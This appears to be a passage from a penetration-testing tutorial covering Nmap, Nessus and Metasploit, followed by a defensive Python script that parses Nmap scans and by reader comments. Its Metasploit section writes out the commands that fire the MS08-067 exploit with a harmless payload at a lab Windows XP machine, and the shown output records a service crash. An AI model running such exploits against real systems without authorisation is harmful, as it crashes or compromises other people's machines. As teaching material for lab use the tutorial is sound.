A Penetration Tester's Toolkit
Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let's look at the RPC issue. Open that up and take a look at the listing (Figure 7).
Figure 7. A Lot Going on Here for a Fresh Build
What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).
Figure 8. Detailed Results
This gives us plenty to work with, but let's make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let's bring in the final tool, the heavy-hitter Metasploit.
Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That's not to say Nessus doesn't get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to support your findings. It never hurts to have an extra set of eyes.
Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you're not careful).
Start by opening a terminal, su to root (if you have given a regular user access to the proper files/directories for Metasploit, it's best to run as said user instead of root), and run the following command (Figure 9):
msfconsole
Figure 9. Behold, Metasploit
Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:
show exploits
Okay, for the purpose of this example, let's use the following command (Figure 10 shows the results), which corresponds to the issue Nessus reported earlier (Figure 8):
use exploit/windows/smb/ms08_067_netapi
Figure 10. Exploits Listed and Exploit Selected
You could use another exploit, which simply would crash the box, but let's try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:
show payloads
Next, select the payload by using the following command:
set payload windows/speak_pwned
Figure 11. Payload Selected
Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.
Listing 2. Output of Exploit
msf exploit(ms08_067_netapi) > set payload windows/speak_pwned
payload => windows/speak_pwned
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       Pipe name to use (BROWSER, SRVSVC)

Payload options (windows/speak_pwned):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of "pwnd". If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).
Figure 12. We broke the box.
You could try a few other exploits (actually quite a few), but this gives you a good idea of how something simple like sending an audible could cause an issue. Again, be careful, and always play on a test box.
Conclusion
As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!
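As an added example of the defensive use described above (this is not code from the article), the following Python script parses Nmap's grepable output from a subnet sweep, reports hosts that are not in a known inventory, and lists which hosts expose a given port. The sample scan output and the inventory are constructed for illustration.

```python
import re
from typing import Dict, List, Set

# Constructed sample of Nmap grepable output (nmap ... -oG -), not a real
# scan result: a sweep of the lab subnet used in the article.
SAMPLE_GREPABLE = """\
# Nmap 6.25 scan initiated Mon May 20 10:00:00 2013 as: nmap -p 135,445 -oG - 192.168.56.0/24
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.1 ()\tPorts: 135/closed/tcp//msrpc///, 445/closed/tcp//microsoft-ds///
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///
Host: 192.168.56.102 ()\tStatus: Up
Host: 192.168.56.102 ()\tPorts: 135/filtered/tcp//msrpc///, 445/open/tcp//microsoft-ds///
# Nmap done at Mon May 20 10:00:05 2013 -- 256 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

# Hypothetical asset inventory: hosts that are expected on this subnet.
KNOWN_HOSTS = {"192.168.56.1"}

HOST_RE = re.compile(r"^Host: (\S+) \(")

def parse_grepable(text: str) -> Dict[str, Dict[str, str]]:
    """Return {ip: {"port/proto": state}} for every host in -oG output."""
    hosts: Dict[str, Dict[str, str]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # skip '# Nmap ...' comment lines
        ports = hosts.setdefault(m.group(1), {})
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(": ")
            if key != "Ports":
                continue  # 'Status', 'Ignored State', etc. carry no port data
            for spec in value.split(", "):
                # each entry is port/state/proto/owner/service/rpc/version
                port, state, proto = spec.split("/")[:3]
                ports[f"{port}/{proto}"] = state
    return hosts

def find_new_hosts(hosts: Dict[str, Dict[str, str]], known: Set[str]) -> List[str]:
    """Hosts that answered the sweep but are not in the inventory."""
    return sorted(set(hosts) - known)

def hosts_exposing(hosts: Dict[str, Dict[str, str]], port_proto: str) -> List[str]:
    """Hosts on which the given port (e.g. '445/tcp') is reported open."""
    return sorted(ip for ip, ports in hosts.items() if ports.get(port_proto) == "open")

if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_GREPABLE)
    print("new hosts:", find_new_hosts(scan, KNOWN_HOSTS))
    print("SMB exposed:", hosts_exposing(scan, "445/tcp"))
```

Feeding it a real sweep is a matter of piping `nmap -p 135,445 -oG - <subnet>` into `parse_grepable` and keeping the inventory set in a file that is updated as hosts are vetted.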
Resources
Nmap: http://nmap.org
Metasploit: http://metasploit.com
Nessus: http://www.nessus.org
Matthew Agle is a 30-year-old senior architect. When he's not focusing on work, hacking, security, his blog or various other hobbies, he can be found playing with his kids and generally annoying his wife.
Comments
Great post. Thank you for
Great post. Thank you for this article.
I'm not really into networking, so being able to use such tools is very convenient to me...
The botheration I see is that
The botheration I see is that Microsoft bankrupt their own disciplinarian archetypal and a lot of humans are XP users still because they can't allow to bandy out all or a lot auto diagnostics of of their hardware. These humans don't apperceive about or accept alone Linux, conceivably because their in abode software will not plan beneath WINE. There is ReactOS, but ReactOS is not abiding and it is not adapted for day to day use yet.
Very cool article. I have
Very cool article. I have used all these tools (been a while since I used Nessus though). Metasploit is awesome, but can be a little overwhelming to use. Nmap is amazing though and has a lot of great features and can be used for a bunch of different things. Great article, thank you!
Nmap is a great tool for this
Nmap is a great tool for this type of work. Have you had a look at OpenVAS?
I think an article on OpenVAS would be a good follow up.
Thanx
Thank you for this article. A must read!
I'm not really into networking, so being able to use such tools is very convenient to me :)
Good Article. Should get
Good Article. Should get people interested enough to try these tools out.
As for ease of use, Metasploit also has a good front end: Armitage.
You're missing The
You're missing The Social-Engineer Toolkit -- one of the best ones out there as well. Good article!
Cool
This is really highly interesting, I tested this on the hosting account used for my website here and I must say the results were more than surprising. You pointed out a few details I never really cared about much. Really simple if you know the problem, which makes being aware even more important. To sum it up: Thanks :)